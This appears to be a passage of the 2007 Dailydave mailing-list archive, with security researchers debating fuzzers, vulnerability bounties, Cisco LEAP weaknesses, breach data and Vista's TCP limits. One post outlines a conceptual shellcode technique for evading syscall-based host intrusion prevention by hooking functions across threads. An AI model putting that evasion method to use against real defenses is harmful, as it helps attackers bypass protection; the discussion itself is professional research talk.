If a flaw is found using a product like Codenomicon/PROTOS or CANVAS, I supposed the reward should also be paid to the tool developer and not the tool user. ;) Tongue-in-the-cheek-greetings, /Ari > Date: Wed, 7 Feb 2007 02:11:16 -0500 (EST) > From: "Steven M. Christey" > Subject: Re: [Dailydave] Some Sums > To: dailydave at lists.immunitysec.com > Message-ID: <200702070711.l177BGJw026300 at faron.mitre.org> > > > > I take it that's going to be the hash of some file or other data > > you're > going to produce for someone at sometime in the future? > > Couldn't you just > have used a ZK protocol and left us all out of > > it? ;-) If you're going to use > our inboxes as substitutes for > > escrow/notarisation centres, you could perhaps > tell us just a > > little bit more about what you're doing! > > MD5/SHA-1 crackability issues aside*, the next question that > immediately comes to mind is why there isn't a central place for > researchers to do exactly this - make a claim about knowledge that's > provably fixed in a certain place and time. Oh, wait, we're all > individuals and we don't need anybody else. There's no need to > organize in any way, shape, or form. After all, when Ilfak posted > that third-party patch, ABSOLUTELY EVERYBODY knew who he was and > immediately trusted him, so why not Halvar? Sorry, I forgot about the > outside world for a second. > > > Snarkily and respectfully, > Steve > > > * crypto is my kryptonite, I defer to the geniuses. From Thierry at Zoller.lu Thu Feb 8 07:34:31 2007 From: Thierry at Zoller.lu (Thierry Zoller) Date: Thu, 8 Feb 2007 13:34:31 +0100 Subject: [Dailydave] SILICA, hashes, etc In-Reply-To: <45CA00E2.30804@immunityinc.com> References: <45CA00E2.30804@immunityinc.com> Message-ID: <1429753244.20070208133431@Zoller.lu> Dear Dave, DA> One of our early adopters has a CISCO Leap network and I DA> remember reading of a simple algorithmic crack for the DA> authentication....has anyone tested it? Asleap - Joshua Wright The funny thing is, although Cisco knows it's broken they continue to use it in new products. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 From dave.aitel at gmail.com Thu Feb 8 08:32:00 2007 From: dave.aitel at gmail.com (Dave Aitel) Date: Thu, 8 Feb 2007 08:32:00 -0500 Subject: [Dailydave] Some Sums In-Reply-To: <20070208051827.GC31087@codenomicon.com> References: <20070208051827.GC31087@codenomicon.com> Message-ID: s/CANVAS/SPIKE/g CANVAS is not a fuzzer. SPIKE is a fuzzer. When PROTOS includes shellcode, you can compare PROTOS and CANVAS. And the thing about fuzzers is that using them is often harder than writing them. For example, a lot of programs will die when fuzzed too quickly. Or they may have one thousand and one ways to trigger a null pointer exception that you have to avoid. Or they may find many different bugs, each of which has to be sorted through for exploitability. Maybe they find 5 different exploitable bugs, but only one of them is reliably exploitable. In other words, there's a lot of work that goes into turning a fuzzer+vuln proggie into bugs you can sell. And, of course, there's no easy way to tell that one fuzzer is any better than the other. 5000 crashes do not equal 1 good remote. It's not a number game, or even a code coverage game. For what it's worth, binary analysis, especially automated binary analysis, suffers from many of the same flaws, and of course you can combine the two techniques, and then you get to sort through even more unexploitable integer overflows. But that's ok, because every single bug is beautiful, right? Some of these bug-buying programs are like affirmative action for vulnerabilities. The original SPIKE release did include a GPG'd advisory, and all it did was make everyone all paranoid. And, of course, I lost the key I used to encrypt it, so now even I wish I knew what the bug was. -dave On 2/8/07, Ari Takanen wrote: > > Hmmm, distantly related to this: Maybe us fuzzer developers should > save hashes of some millions of attacks somewhere also, so that we can > prove our tools were used to find the flaws in the first > place... Looking at past iDefence disclosures for example, I am > beginning to doubt that they reward for publishing flaws instead of > finding flaws (this is like patent system in Europe which rewards > first to file, not first to invent)... More and more flaws are found > using tools, and pre-packaged attacks. If a flaw is found using a > product like Codenomicon/PROTOS or CANVAS, I supposed the reward > should also be paid to the tool developer and not the tool user. ;) > > Tongue-in-the-cheek-greetings, > > /Ari > > > Date: Wed, 7 Feb 2007 02:11:16 -0500 (EST) > > From: "Steven M. Christey" > > Subject: Re: [Dailydave] Some Sums > > To: dailydave at lists.immunitysec.com > > Message-ID: <200702070711.l177BGJw026300 at faron.mitre.org> > > > > > > > I take it that's going to be the hash of some file or other data > > > you're > going to produce for someone at sometime in the future? > > > Couldn't you just > have used a ZK protocol and left us all out of > > > it? ;-) If you're going to use > our inboxes as substitutes for > > > escrow/notarisation centres, you could perhaps > tell us just a > > > little bit more about what you're doing! > > > > MD5/SHA-1 crackability issues aside*, the next question that > > immediately comes to mind is why there isn't a central place for > > researchers to do exactly this - make a claim about knowledge that's > > provably fixed in a certain place and time. Oh, wait, we're all > > individuals and we don't need anybody else. There's no need to > > organize in any way, shape, or form. After all, when Ilfak posted > > that third-party patch, ABSOLUTELY EVERYBODY knew who he was and > > immediately trusted him, so why not Halvar? Sorry, I forgot about the > > outside world for a second. > > > > > > Snarkily and respectfully, > > Steve > > > > > > * crypto is my kryptonite, I defer to the geniuses. > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070208/ebcef1c9/attachment.htm From phatbuckett at gmail.com Thu Feb 8 09:32:22 2007 From: phatbuckett at gmail.com (Darren Spruell) Date: Thu, 8 Feb 2007 07:32:22 -0700 Subject: [Dailydave] SILICA, hashes, etc In-Reply-To: <1429753244.20070208133431@Zoller.lu> References: <45CA00E2.30804@immunityinc.com> <1429753244.20070208133431@Zoller.lu> Message-ID: <839aec700702080632l49435eds57d94c8147102988@mail.gmail.com> On 2/8/07, Thierry Zoller wrote: > Dear Dave, > > DA> One of our early adopters has a CISCO Leap network and I > DA> remember reading of a simple algorithmic crack for the > DA> authentication....has anyone tested it? > > Asleap - Joshua Wright > The funny thing is, although Cisco knows it's broken they continue to > use it in new products. Another funny thing is, if you confront any Cisco engineer about LEAP's insecurities, they claim to be encouraging customers to go to EAP-FAST instead. http://www.cisco.com/en/US/products/hw/wireless/ps430/products_qanda_item09186a00802030dc.shtml http://www.ciscopress.com/articles/article.asp?p=369223&seqNum=5&rl=1 Seems the security implementation of EAP-FAST has its own share of imperfections as well though. I wonder why a more standardized wireless security protocol didn't appeal to Cisco instead? DS From olef.anderson at gmail.com Thu Feb 8 12:48:36 2007 From: olef.anderson at gmail.com (Olef Anderson) Date: Thu, 8 Feb 2007 09:48:36 -0800 Subject: [Dailydave] Some Sums In-Reply-To: <20070208051827.GC31087@codenomicon.com> References: <20070208051827.GC31087@codenomicon.com> Message-ID: <9b4f936f0702080948t5e4231ja4eab38d2523b8aa@mail.gmail.com> About this whole fuzzer business, how about putting some cold hard cash where the corporate mouthpiece is at ? Since obviously you happen to have some VC money, a booth at the RSA floor is a sign, you can back your claims with real currency. I would love to give you the opportunity. Lets take the latest Microsoft Exchange release (2007) and 2 weeks of your time running your PROTOS fuzzer. At the end of the 2 weeks if you can find the existing remote root hole in it, I am offering to pay you the bugs worth of $150 000.00. However If you are not successful, I should be payed the very same amount which in return I shall present you the exploit. From that point you will be free to coordinate vendors, release advisories whatever it takes. Just to clarify a point though, no DoSes are acceptable, should be an overflow that leads to clear code execution ( the mailing list subscribers could be the judge of that). Wouldn't that be nice to prove that you actually know what you are talking about ? On 2/7/07, Ari Takanen wrote: > > Hmmm, distantly related to this: Maybe us fuzzer developers should > save hashes of some millions of attacks somewhere also, so that we can > prove our tools were used to find the flaws in the first > place... Looking at past iDefence disclosures for example, I am > beginning to doubt that they reward for publishing flaws instead of > finding flaws (this is like patent system in Europe which rewards > first to file, not first to invent)... More and more flaws are found > using tools, and pre-packaged attacks. If a flaw is found using a > product like Codenomicon/PROTOS or CANVAS, I supposed the reward > should also be paid to the tool developer and not the tool user. ;) > > Tongue-in-the-cheek-greetings, > > /Ari > > > Date: Wed, 7 Feb 2007 02:11:16 -0500 (EST) > > From: "Steven M. Christey" > > Subject: Re: [Dailydave] Some Sums > > To: dailydave at lists.immunitysec.com > > Message-ID: <200702070711.l177BGJw026300 at faron.mitre.org> > > > > > > > I take it that's going to be the hash of some file or other data > > > you're > going to produce for someone at sometime in the future? > > > Couldn't you just > have used a ZK protocol and left us all out of > > > it? ;-) If you're going to use > our inboxes as substitutes for > > > escrow/notarisation centres, you could perhaps > tell us just a > > > little bit more about what you're doing! > > > > MD5/SHA-1 crackability issues aside*, the next question that > > immediately comes to mind is why there isn't a central place for > > researchers to do exactly this - make a claim about knowledge that's > > provably fixed in a certain place and time. Oh, wait, we're all > > individuals and we don't need anybody else. There's no need to > > organize in any way, shape, or form. After all, when Ilfak posted > > that third-party patch, ABSOLUTELY EVERYBODY knew who he was and > > immediately trusted him, so why not Halvar? Sorry, I forgot about the > > outside world for a second. > > > > > > Snarkily and respectfully, > > Steve > > > > > > * crypto is my kryptonite, I defer to the geniuses. > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070208/cf9b5136/attachment-0001.htm From pmelson at gmail.com Thu Feb 8 17:05:59 2007 From: pmelson at gmail.com (Paul Melson) Date: Thu, 8 Feb 2007 17:05:59 -0500 Subject: [Dailydave] SILICA, hashes, etc In-Reply-To: <45CA00E2.30804@immunityinc.com> References: <45CA00E2.30804@immunityinc.com> Message-ID: <006001c74bcd$510b6a70$3400300a@ad.priorityhealth.com> > One of our early adopters has a CISCO Leap network and I remember reading of a simple algorithmic crack > for the authentication....has anyone tested it? LEAP uses MS-CHAPv1 (PPTP circa NT4), which sends the LANMan v1 hash otherwise in the clear. LEAP doesn't actually introduce any new security problems, it just reuses old ones. The debate over what to use for wireless security should be old by now. XP-SP1 and Cisco firmware updates should eliminate the need for substandard third-party supplicants that use substandard third-party crypto. But if there's one thing Cisco's not good at, it's walking away from its own ideas. PaulM From adam at homeport.org Thu Feb 8 14:37:14 2007 From: adam at homeport.org (Adam Shostack) Date: Thu, 8 Feb 2007 14:37:14 -0500 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: References: <20070207025853.GA21338@codeblau.de> <20070207073538.946E71BF9DA@absinthe.tinho.net> <20070207183926.GA31790@homeport.org> Message-ID: <20070208193714.GA12590@homeport.org> Avery, I'll know it when I see it. :) I was really excited to see "Is There a Cost to Privacy Breachs? An Event Study," Alessandro Acquisti, Allan Friedman, and Rahul Telang. WEIS 2006 and ICIS 2006. (http://www.heinz.cmu.edu/~acquisti/papers/acquisti-friedman-telang-privacy-breaches.pdf) This study debunked the idea that breach notices hurt the company's shareholders in the long run. It's an important mis-conception, and I'm glad to have data to show that it's wrong. Similarly, I was pleased to see my co-blogger Chris Walsh refute a claim about 'the industry's dumbest practice' by looking at data. (http://www.emergentchaos.com/archives/2006/12/lets_look_at_some_data.html) So I don't know what I want to see in detail. But what I want to see, in a broad sense, is that we get over our shame over having made mistakes, and start discussing what really goes wrong. I want to see us discussing it in a data driven fashion. Data is not the plural of anecdote. Data comes from having a consistent sampling method. "Compelled by law to disclose, and unable to find a loophole" is admittedly not the best sampling method, but it's better than anecdote, and it's better than voluntary anonymous survey. I hope that by understanding that the sky isn't falling, we can evolve better sampling and disclosure, and start to make real progress by studying problems. I'll get off my soapbox before Dave kills me now. Adam On Wed, Feb 07, 2007 at 09:15:14PM -0500, Avery Sawaba wrote: | I'm actually doing some analysis on this data right now (I'm | sawaba at attrition.org). Is there anything in particular you'd like to see? | Perhaps I already have some of what you're looking for, but I haven't posted | any of my metrics. I can drop a note to the list if/when something is posted. | | --Sawaba | | On 2/7/07, Adam Shostack wrote: | | Speaking for myself, I think there are much more interesting questions | than looking at correlations between defects and complexity. For | example, we could look at correlations between failures in the real | world and training/education. | | The breach notices that Attrition is accumulating | (http://attrition.org/dataloss) give us a set of real wolrd failure | data. That's something we've never really had. Now we can start | mining it and learning things. For example, does the number of CISSPs | employed by an organization correlate with the reports of failures | compared to other similar orgs? Is that correlation positive or | negative? Does "user education" have an effect? | | There's a huge amount of data in the attrition data set, and it all | involves real pain that real organizations are feeling as they try to | secure their data. It's worth studying. | | Adam | | On Wed, Feb 07, 2007 at 02:35:38AM -0500, dan at geer.org wrote: | | | | If anyone wants to argue about whether complexity | | and security are negatively correlated, then let's | | get to it. | | | | --dan, resisting burning bandwidth unasked | | | | _______________________________________________ | | Dailydave mailing list | | Dailydave at lists.immunitysec.com | | http://lists.immunitysec.com/mailman/listinfo/dailydave | _______________________________________________ | Dailydave mailing list | Dailydave at lists.immunitysec.com | http://lists.immunitysec.com/mailman/listinfo/dailydave | | From asotirov at determina.com Thu Feb 8 20:49:30 2007 From: asotirov at determina.com (Alexander Sotirov) Date: Thu, 08 Feb 2007 17:49:30 -0800 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <45C923E3.4070509@immunityinc.com> References: <45C923E3.4070509@immunityinc.com> Message-ID: <45CBD32A.7080504@determina.com> Dave Aitel wrote: > For the record, or at least, as a reminder to the record, anything > based solely on system call ordering is going to have a bugger of a > time dealing with CreateThread(). What is the problem with CreateThread? You just need to look at the syscall ordering per thread, not per process, and everything will be fine. Alex From dfc at anize.org Fri Feb 9 12:57:06 2007 From: dfc at anize.org (Douglas F. Calvert) Date: Fri, 09 Feb 2007 12:57:06 -0500 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <20070208193714.GA12590@homeport.org> References: <20070207025853.GA21338@codeblau.de> <20070207073538.946E71BF9DA@absinthe.tinho.net> <20070207183926.GA31790@homeport.org> <20070208193714.GA12590@homeport.org> Message-ID: <45CCB5F2.60106@anize.org> Adam Shostack wrote: > Avery, > > I'll know it when I see it. :) > > I was really excited to see "Is There a Cost to Privacy Breachs? An > Event Study," Alessandro Acquisti, Allan Friedman, and Rahul > Telang. WEIS 2006 and ICIS 2006. > (http://www.heinz.cmu.edu/~acquisti/papers/acquisti-friedman-telang-privacy-breaches.pdf) > This study debunked the idea that breach notices hurt the company's > shareholders in the long run. It's an important mis-conception, and > I'm glad to have data to show that it's wrong. > > Why wouldn't you want the market to punish actors with security lapses? Economic incentives are the only way security will be taken seriously. In related news: "Mutually Assured Protection: Toward Development of Relational Internet Data Security and Privacy Contracting Norms" SECURING PRIVACY IN THE INTERNET AGE, Radin et al., eds., Stanford University Press, 2006 Contact: ANDREA M. MATWYSHYN University of Florida, University of Cambridge Email: andreamm at ufl.edu Auth-Page: http://ssrn.com/author=627948 Full Text: http://ssrn.com/abstract=914420 ABSTRACT: This paper empirically and normatively explores the current data security contracting regime that exists online. Using an analytical lens from complexity theory, this article presents an empirical study of 75 websites of publicly traded companies across time, tracking legal emergence of data security contracting practices. It then argues that a new legal construction for data security contracting is needed to replace the current regime of terms of use and privacy policies; current internet data security contracting structures do not facilitate building of commercial trust. -- Douglas F. Calvert -/- dfc at anize.org 0xC9541FB2 / 0817 30D4 82B6 BB8D 5E66 06F6 B796 073D C954 1FB2 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 825 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20070209/16686240/attachment.pgp From dave.aitel at gmail.com Fri Feb 9 16:17:23 2007 From: dave.aitel at gmail.com (Dave Aitel) Date: Fri, 9 Feb 2007 16:17:23 -0500 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <45CBD32A.7080504@determina.com> References: <45C923E3.4070509@immunityinc.com> <45CBD32A.7080504@determina.com> Message-ID: In the famous Buffy episode "Hush", Joss Whedon demonstrates through a creative plot device - removing the voices from the entire town - that often talking is the opposite of communication. But I don't have time to draw pretty pictures, so here goes. Imagining a simple host intrusion protection device that makes a graph of system call chains of a process as it runs normally, and then in the future restricts the process to those system call chains. These chains start with a CreateThread() and can end at any point, but typically with an ExitThread(). Given this simple system, we can defeat it with a "hooker shellcode" which hooks the functions our shellcode wants to call. For example, "accept()" ,"recv()", "CreateFile", "Write()" and so on. Because system call arguments are not looked at, we replace the original arguments with the arguments we would prefer, and then let the process continue. Each system call may happen in a completely different thread, but it will happen exactly as the HIPS thinks it should, just with different arguments. Essentially the problem is that the HIPS models on a per-thread basis, and there is no per-thread memory isolation. Of course to do the hooks themselves you'll want to call VirtualProtect, but we can do something more invasive to take over every thread's exception handler and play our little raindeer games. We can, after all, write into every thread's stack. And of course, it may be that statistically, CreateThread() branches quite predictably. So if we can call CreateThread, we might be able to do anything we want after that point. CreateThread(DoAcceptData()); CreateThread(DoWriteDataToFile()) CreateThread(DoExecFile()) and so on. Today I played a lot more with Vista. It turns out it DOES have the 10-half-open TCP connection limit. And there's no way to shut that off. I take back what I said about it being better than XP SP2. -dave On 2/8/07, Alexander Sotirov wrote: > > Dave Aitel wrote: > > For the record, or at least, as a reminder to the record, anything > > based solely on system call ordering is going to have a bugger of a > > time dealing with CreateThread(). > > What is the problem with CreateThread? You just need to look at the > syscall > ordering per thread, not per process, and everything will be fine. > > Alex > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070209/3fa9e177/attachment.htm From ari.takanen at codenomicon.com Sat Feb 10 15:41:44 2007 From: ari.takanen at codenomicon.com (Ari Takanen) Date: Sat, 10 Feb 2007 22:41:44 +0200 Subject: [Dailydave] Some Sums In-Reply-To: References: Message-ID: <20070210204144.GA20960@codenomicon.com> Hello Olef, Sorry did not notice this comment earlier. Sounds like an interesting challenge, but there are few problems withy the setup. Firstly, our tool does not run for 2 weeks (it takes less than few hours to test the MS Exchange). This is because we do not do random (or any form of non-deterministic) testing. Secondly, we are fully no-disclosure company, and refuse to disclose flaws in commercial software (and our customers appreciate this). We are not in the blackmailing business... Open source would be free target though (my personal opinion, not our company opinion). Thirdly, we do not build exploits like Dave already pointed out earlier, again from ethical reasons (and because nobody has ever asked us to develop exploits for the found flaws even if building the exploit would be easy). And last note, we would have no use nor interest for your exploit, nor would we want to even see it due to the related liability issues. So I am sorry I have to decline the offer. You are free to continue hunting for your fame and glory from the remote exploits. I wish you good luck in the hunt! And I will shut up about our products as I definitely do not even want you to get these tools in your hand. ;) I hope you had a chance to visit us at RSA! We are constantly looking for skilled people who wish to start doing more proactive work in security. /Ari PS: Yes we have some VC funding (from early 2005), but most of our money comes from customers, not from VC:s. And we do not throw our money away like some other VC funded companies might appear to be doing. We have existed since 2001, and released our first commercial fuzzing tools in 2002. On Thu, Feb 08, 2007 at 01:22:02PM -0500, dailydave-request at lists.immunitysec.com wrote: > Date: Thu, 8 Feb 2007 09:48:36 -0800 > From: "Olef Anderson" > Subject: Re: [Dailydave] Some Sums > To: dailydave at lists.immunitysec.com > > About this whole fuzzer business, how about putting some cold hard cash > where the corporate mouthpiece is at ? > Since obviously you happen to have some VC money, a booth at the RSA floor > is a sign, you can back your claims with real currency. I would love to give > you the opportunity. > > Lets take the latest Microsoft Exchange release (2007) and 2 weeks of your > time running your PROTOS fuzzer. At the end of the 2 weeks if you can find > the existing remote root hole in it, I am offering to pay you the bugs worth > of $150 000.00. However If you are not successful, I should be payed the > very same amount which in return I shall present you the exploit. From that > point you will be free to coordinate vendors, release advisories whatever it > takes. Just to clarify a point though, no DoSes are acceptable, should be an > overflow that leads to clear code execution ( the mailing list subscribers > could be the judge of that). > > Wouldn't that be nice to prove that you actually know what you are talking > about ? > > On 2/7/07, Ari Takanen wrote: > > > > Hmmm, distantly related to this: Maybe us fuzzer developers should > > save hashes of some millions of attacks somewhere also, so that we can > > prove our tools were used to find the flaws in the first > > place... Looking at past iDefence disclosures for example, I am > > beginning to doubt that they reward for publishing flaws instead of > > finding flaws (this is like patent system in Europe which rewards > > first to file, not first to invent)... More and more flaws are found > > using tools, and pre-packaged attacks. If a flaw is found using a > > product like Codenomicon/PROTOS or CANVAS, I supposed the reward > > should also be paid to the tool developer and not the tool user. ;) > > > > Tongue-in-the-cheek-greetings, > > > > /Ari -- -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o- Ari Takanen Codenomicon Ltd. ari.takanen at codenomicon.com Tutkijantie 4E tel: +358-40 50 67678 FIN-90570 Oulu http://www.codenomicon.com Finland PGP: http://www.codenomicon.com/codenomicon-key.asc -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o- From tqbf at matasano.com Sun Feb 11 13:06:16 2007 From: tqbf at matasano.com (Thomas Ptacek) Date: Sun, 11 Feb 2007 12:06:16 -0600 Subject: [Dailydave] Some Sums In-Reply-To: <20070210204144.GA20960@codenomicon.com> References: <20070210204144.GA20960@codenomicon.com> Message-ID: <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com> The fuzzing vs. inspecting argument is fun and I'm happy to read it from the sidelines, but can I suggest: 1. It's not insightful to point out that fuzzers don't find everything; the point is, they find a lot. 2. A lot of people are "finding" things simply by being the first to aim someone else's fuzzer at them. I'm not sure what this implies, but it implies something. 3. Ari Takanen, and in particular the OUSPG project at OULU.FI, clearly has some software testing bona fides; PROTOS may be the first comprehensive rule-based format-aware fuzzer for ASN.1 protocols. The SNMP report from '02 was a Big Deal. 4. Ari, if you get on DailyDave and making fun of people for competitive vuln research, you deserve all the crap you get. Troll. =) On 2/10/07, Ari Takanen wrote: > Hello Olef, > > Sorry did not notice this comment earlier. Sounds like an interesting > challenge, but there are few problems withy the setup. Firstly, our > tool does not run for 2 weeks (it takes less than few hours to test > the MS Exchange). This is because we do not do random (or any form of > non-deterministic) testing. Secondly, we are fully no-disclosure > company, and refuse to disclose flaws in commercial software (and our > customers appreciate this). We are not in the blackmailing > business... Open source would be free target though (my personal > opinion, not our company opinion). Thirdly, we do not build exploits > like Dave already pointed out earlier, again from ethical reasons (and > because nobody has ever asked us to develop exploits for the found > flaws even if building the exploit would be easy). And last note, we > would have no use nor interest for your exploit, nor would we want to > even see it due to the related liability issues. > > So I am sorry I have to decline the offer. You are free to continue > hunting for your fame and glory from the remote exploits. I wish you > good luck in the hunt! And I will shut up about our products as I > definitely do not even want you to get these tools in your hand. ;) > > I hope you had a chance to visit us at RSA! We are constantly looking > for skilled people who wish to start doing more proactive work in > security. > > /Ari > > PS: Yes we have some VC funding (from early 2005), but most of our > money comes from customers, not from VC:s. And we do not throw our > money away like some other VC funded companies might appear to be > doing. We have existed since 2001, and released our first commercial > fuzzing tools in 2002. > > On Thu, Feb 08, 2007 at 01:22:02PM -0500, dailydave-request at lists.immunitysec.com wrote: > > Date: Thu, 8 Feb 2007 09:48:36 -0800 > > From: "Olef Anderson" > > Subject: Re: [Dailydave] Some Sums > > To: dailydave at lists.immunitysec.com > > > > About this whole fuzzer business, how about putting some cold hard cash > > where the corporate mouthpiece is at ? > > Since obviously you happen to have some VC money, a booth at the RSA floor > > is a sign, you can back your claims with real currency. I would love to give > > you the opportunity. > > > > Lets take the latest Microsoft Exchange release (2007) and 2 weeks of your > > time running your PROTOS fuzzer. At the end of the 2 weeks if you can find > > the existing remote root hole in it, I am offering to pay you the bugs worth > > of $150 000.00. However If you are not successful, I should be payed the > > very same amount which in return I shall present you the exploit. From that > > point you will be free to coordinate vendors, release advisories whatever it > > takes. Just to clarify a point though, no DoSes are acceptable, should be an > > overflow that leads to clear code execution ( the mailing list subscribers > > could be the judge of that). > > > > Wouldn't that be nice to prove that you actually know what you are talking > > about ? > > > > On 2/7/07, Ari Takanen wrote: > > > > > > Hmmm, distantly related to this: Maybe us fuzzer developers should > > > save hashes of some millions of attacks somewhere also, so that we can > > > prove our tools were used to find the flaws in the first > > > place... Looking at past iDefence disclosures for example, I am > > > beginning to doubt that they reward for publishing flaws instead of > > > finding flaws (this is like patent system in Europe which rewards > > > first to file, not first to invent)... More and more flaws are found > > > using tools, and pre-packaged attacks. If a flaw is found using a > > > product like Codenomicon/PROTOS or CANVAS, I supposed the reward > > > should also be paid to the tool developer and not the tool user. ;) > > > > > > Tongue-in-the-cheek-greetings, > > > > > > /Ari > > -- > -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o- > Ari Takanen Codenomicon Ltd. > ari.takanen at codenomicon.com Tutkijantie 4E > tel: +358-40 50 67678 FIN-90570 Oulu > http://www.codenomicon.com Finland > PGP: http://www.codenomicon.com/codenomicon-key.asc > -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o- > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From rdobbins at cisco.com Sun Feb 11 16:55:22 2007 From: rdobbins at cisco.com (Roland Dobbins) Date: Sun, 11 Feb 2007 13:55:22 -0800 Subject: [Dailydave] Some Sums In-Reply-To: <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com> References: <20070210204144.GA20960@codenomicon.com> <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com> Message-ID: <3E3B6D5E-7E6F-4FAE-9439-28DE3BDCE5F5@cisco.com> On Feb 11, 2007, at 10:06 AM, Thomas Ptacek wrote: > 2. A lot of people are "finding" things simply by being the first to > aim someone else's fuzzer at them. I'm not sure what this implies, but > it implies something. I think one possible implication is that fuzzing doesn't yet seem to be a routine element of the testing/QA process. ----------------------------------------------------------------------- Roland Dobbins // 408.527.6376 voice The telephone demands complete participation. -- Marshall McLuhan From coley at mitre.org Mon Feb 12 00:58:46 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 12 Feb 2007 00:58:46 -0500 (EST) Subject: [Dailydave] Some Sums Message-ID: <200702120558.l1C5wkkQ007769@faron.mitre.org> Tom Ptacek said: >2. A lot of people are "finding" things simply by being the first to >aim someone else's fuzzer at them. I'm not sure what this implies, but >it implies something. It's a reflection of the disjointed, disorganized, competitive, non-cooperative nature of the vuln research discipline - at least as far as I can tell as an outsider. The fact that some important vulns are found by multiple researchers is also a reflection of this problem, which is at least a problem from the "secure all software for the public good" perspective - maybe not from other perspectives :) And/or, maybe fewer people are using fuzzers than assumed - I'd be interested in hearing what the fuzzer people think. One of the ideas I'll probably never get to implement is to do a chart of major technologies, which vuln types have been found in those technologies, and/or which fuzzers have been aimed at them. That chart would probably have tons of holes in the beginning, but it might at least provide one small mechanism for pointing industrious people in different directions. Take VoIP for example - it's kind of a shame that most VoIP vulns are still in the minimal-complexity, pre-auth, core functionality, obvious "Ax999" and "../../" manipulation stages. Somebody industrious could totally steal this idea (with my blessing) and put a few days of work into it and make something nice out of it, but eh - easier said than done by somebody else. - Steve From demottja at msu.edu Mon Feb 12 08:02:32 2007 From: demottja at msu.edu (Jared DeMott) Date: Mon, 12 Feb 2007 08:02:32 -0500 Subject: [Dailydave] Some Sums In-Reply-To: <200702120558.l1C5wkkQ007769@faron.mitre.org> References: <200702120558.l1C5wkkQ007769@faron.mitre.org> Message-ID: <45D06568.8060902@msu.edu> Steven M. Christey wrote: > Tom Ptacek said: > > >> 2. A lot of people are "finding" things simply by being the first to >> aim someone else's fuzzer at them. I'm not sure what this implies, but >> it implies something. >> > > And/or, maybe fewer people are using fuzzers than assumed - I'd be > interested in hearing what the fuzzer people think. > > A few of things off the top of my head: First of all some fuzzers cost (a lot of) money. So free lance researchers and/or small research companies aren't going to buy them. Same would be true for small software companies. I wonder if a small software company outsources their testing, and the company doing the testing owns expensive fuzzers, would that be a way to drive down total cost of ownership? Secondly, many researchers like to build and use their own fuzzers because it's assumed that other people are, or will soon, use the for pay/public fuzzers. If the assumption holds true the shelf life of potentially discovered bugs will decrease. This is bad for many reasons, mostly because if you simply use someone else's fuzzer the bulk of your costs will be time to develop bugs discovered. It's a shame for that work to go down the drain. But if it helps you find stuff quicker without the costs of building your own fuzzer ... I'll let someone else argue both sides. Just bring up possible considerations. :) And of course this assumption doesn't hold water for software companies, that ought to be doing their own testing. Lastly, as Dave pointed out a few posts ago, building != buying != using. Correctly using is half (or some arguable portion) the battle. I can't imagine a day when even the best testing or security research tools are, "click the big green go button for instant perfect results". -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070212/412cc193/attachment.htm From secadmin at netsecdesign.com Mon Feb 12 11:14:57 2007 From: secadmin at netsecdesign.com (Ed Ray) Date: Mon, 12 Feb 2007 08:14:57 -0800 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: References: <45C923E3.4070509@immunityinc.com> <45CBD32A.7080504@determina.com> Message-ID: <61461588C1AD0840A6104C1AF849D8DA073C8E@exchange.mmicmanhomenet.local> > Today I played a lot more with Vista. It turns out it DOES > have the 10-half-open TCP connection limit. And there's no > way to shut that off. I take back what I said about it being > better than XP SP2. > > -dave Yeah, just noticed this myself. Seems the lvllord patch to up the half-open connections from 10 to 50 does not work on Vista. :( Edward Ray -- This mail was scanned by BitDefender For more informations please visit http://www.bitdefender.com From pmelson at gmail.com Mon Feb 12 11:09:33 2007 From: pmelson at gmail.com (Paul Melson) Date: Mon, 12 Feb 2007 11:09:33 -0500 Subject: [Dailydave] Some Sums In-Reply-To: <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com> References: <20070210204144.GA20960@codenomicon.com> <1df0a410702111006j149cc5c5w18d8d00f6ce1204a@mail.gmail.com> Message-ID: <006c01c74ec0$2fb88e20$0202fea9@ad.priorityhealth.com> > 2. A lot of people are "finding" things simply by being the first to aim someone else's fuzzer at them. > I'm not sure what this implies, but it implies something. Ooh, maybe it implies that the art of finding software vulnerabilities is ready for some big consultancy to turn it into a canned 2-week deliverable. Experienced coders will be replaced by a couple of CSA's with Spike and Peach and only 3 semesters of C++ between them. Perhaps eventually it will get to a point where Qualys builds a product where you upload your .MSI file to a VM and they just e-mail you a report. Or maybe it just means that as fuzzers get better, KF will have to announce a QOAB or a YOAB. :-) PaulM From 